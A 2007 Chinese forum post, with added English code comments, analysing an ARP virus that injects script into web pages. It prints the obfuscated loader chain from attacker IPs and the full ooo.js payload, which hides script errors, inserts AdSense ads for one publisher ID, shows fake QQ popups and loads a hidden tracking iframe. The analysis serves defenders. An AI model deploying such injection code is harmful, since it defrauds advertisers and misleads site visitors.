发表于 2007-12-29 00:02
郁闷死,搜了一下,360安全论坛也很多人求助,但暂时没有人能提出有效方法杀毒。
又一个ARP病毒,带GG广告和百万q币大放送的仿腾讯
最主要的特征是在网页第一行有<script src=http://121.11.245.180/1.js></script> 的脚本..
我们看一下具体的图

打开上边那个1.js,可以发现有如下内容
document.write(unescape(’%3Cscript%3E%0D%0A%0D%0Adocument.writeln%28%22%3Cscript%20type%3D%5C%22text%5C/javascript%5C%22%20src%20%3D%20%5C%22http%3A%5C/%5C/121.15.245.60%5C/oo.asp%5C%22%3E%3C%5C/script%3E%22%29%0D%0A%0D%0A%3C/script%3E’))
注意,还是unescape过的,我们解密一下,看到
document.write(unescape(’<script>
document.writeln(”<script type=\”text\/javascript\” src = \”http:\/\/121.15.245.60\/oo.asp\”><\/script>”)
</script>’))
我们打开http://121.15.245.60/oo.asp 可以看到源码是
<script src=http://121.11.245.180/1.js></script>
document.writeln(”<script type=\”text\/javascript\” src = \”http:\/\/121.15.245.60\/ooo.js\”><\/script>”)
上边那个我们见过了,看下边的..下载,打开
// Start of the ooo.js payload: everything below is document.writeln'd straight into the hosting page.
document.writeln(”<center>”);
// Swallow every script error (onerror returning true suppresses the default handler),
// so broken injected markup or a failed ad load never shows an error to the victim.
window.onerror = function (){return true};
// Returns a random integer in 1..a; used below as hgbrand(6) to pick one of six injection variants.
// NOTE(review): `p***Int` is redacted in the forum paste — presumably parseInt, confirm against the original sample.
function hgbrand(a)
{
return p***Int((a)*Math.random()+1);
}
// Navigates element `a` to about:blank and empties the innerHTML of element `b`.
// Not referenced anywhere else in this listing; likely a "close" handler for the floating ad frames.
function hgbvclosew(a,b)
{
document.getElementById(a).location=’about:blank’;
document.getElementById(b).innerHTML=”";
}
优文网络提醒您,上边这个innerHTML=”";用的是动态插入,所以你看到的广告或其他的是不同的..
// Injection selector. One of six variants is chosen at random; every variant writes a Google
// AdSense 728x90 unit for publisher pub-6651899251830388 (channel 8570106281), differing only in
// colour scheme. Variants 5 and 6 additionally write a floating image ad imitating a QQ prompt,
// pinned to the bottom-right corner by a 200 ms setInterval and linking to 121.15.245.60.
// Unconditionally, a hidden 0x0 iframe to w.c0mo.com/1.htm is appended at the end.
// Defender notes: 121.11.245.180 (1.js), 121.15.245.60 (oo.asp / ooo.js / qq images / landing
// pages) and w.c0mo.com are the network indicators from this analysis; the repeated
// `<script src=http://121.11.245.180/1.js>` on the first line of served pages is the on-host signature.
var hgbnumTemp;
hgbnumTemp=hgbrand(6);
// Variant 1: AdSense unit, colour scheme CC00FF / CC99FF.
if (hgbnumTemp==1)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”CC00FF\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”CC00FF\”;”);
document.writeln(”google_color_text = \”CC99FF\”;”);
document.writeln(”google_color_url = \”CC44FF\”;”);
document.writeln(”google_ui_features = \”rc:10\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(” src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
}
// Variant 2: identical to variant 1 (same colours); the duplication only skews the odds.
if (hgbnumTemp==2)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”CC00FF\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”CC00FF\”;”);
document.writeln(”google_color_text = \”CC99FF\”;”);
document.writeln(”google_color_url = \”CC44FF\”;”);
document.writeln(”google_ui_features = \”rc:10\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(” src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
}
// Variant 3: AdSense unit, colour scheme 9900CC / CC97E6.
if (hgbnumTemp==3)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”9900CC\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”9900CC\”;”);
document.writeln(”google_color_text = \”CC97E6\”;”);
document.writeln(”google_color_url = \”9900CD\”;”);
document.writeln(”google_ui_features = \”rc:6\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(” src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
}
// Variant 4: identical to variant 3.
if (hgbnumTemp==4)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”9900CC\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”9900CC\”;”);
document.writeln(”google_color_text = \”CC97E6\”;”);
document.writeln(”google_color_url = \”9900CD\”;”);
document.writeln(”google_ui_features = \”rc:6\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(” src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
}
// Variant 5: AdSense unit (72179D scheme) plus the first fake-QQ floating ad (div#adid, play.html / jq5.gif).
if (hgbnumTemp==5)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”72179D\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”72179D\”;”);
document.writeln(”google_color_text = \”6C82B5\”;”);
document.writeln(”google_color_url = \”6131BD\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(” src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
/// The blocks above are Google ads for publisher ID pub-6651899251830388; unclear whether it belongs to the malware author or was planted to frame someone else.
// Floating image ad: absolutely positioned div, re-pinned to the bottom-right every 200 ms via document.all (IE-only API).
document.writeln(”<div id=\”adid\” style=\”position:absolute;bottom:0px;right:0px;background-color:#ffffff\”><a href=\”http:\/\/121.15.245.60\/play.html\” target=\”_blank\”><img src=\”http:\/\/121.15.245.60\/qq\/jq5.gif\” border=\”0\”><\/a><\/div>”);
document.writeln(”<script>setInterval(\”runadid1dfas23()\”,200);function runadid1dfas23(){document.all.adid.style.top=document.body.scrollTop+document.body.clientHeight-159;document.all.adid.style.left=document.body.scrollLeft +document.body.clientWidth-256}<\/script>”)
}
/// That was the code for the fake-QQ popup shown below.
// Variant 6: same AdSense unit as variant 5 plus the second fake-QQ floating ad (div#adidd, qq.html / qq2.gif).
if (hgbnumTemp==6)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”72179D\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”72179D\”;”);
document.writeln(”google_color_text = \”6C82B5\”;”);
document.writeln(”google_color_url = \”6131BD\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(” src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
/// This is also a Google ad, same as above.
document.writeln(”<div id=\”adidd\” style=\”position:absolute;bottom:0px;right:0px;background-color:#ffffff\”><a href=\”http:\/\/121.15.245.60\/qq.html\” target=\”_blank\”><img src=\”http:\/\/121.15.245.60\/qq\/qq2.gif\” border=\”0\”><\/a><\/div>”);
document.writeln(”<script>setInterval(\”runadidd1dfas23()\”,200);function runadidd1dfas23(){document.all.adidd.style.top=document.body.scrollTop+document.body.clientHeight-138;document.all.adidd.style.left=document.body.scrollLeft +document.body.clientWidth-209}<\/script>”)
}
/// This is also the fake-QQ code shown below.
// Runs regardless of the chosen variant: invisible iframe to w.c0mo.com/1.htm (the forum author
// found it to be a cnzz.com hit counter, i.e. the operator tracking infections).
document.writeln(”<iframe src=\”http:\/\/w.c0mo.com\/1.htm\” width=\”0\” height=\”0\”><\/iframe>”);
document.writeln(”</center>”);
注意上边这个iframe,打开,原来是个统计代码,这病毒作者也是分析专家呀..代码如下
<script src=’http://s119.cnzz.com/stat.php?id=675882&web_id=675882&show=pic1′ language=’JavaScript’ ch***t=’gb2312′></script>
以上就是代码的具体分析。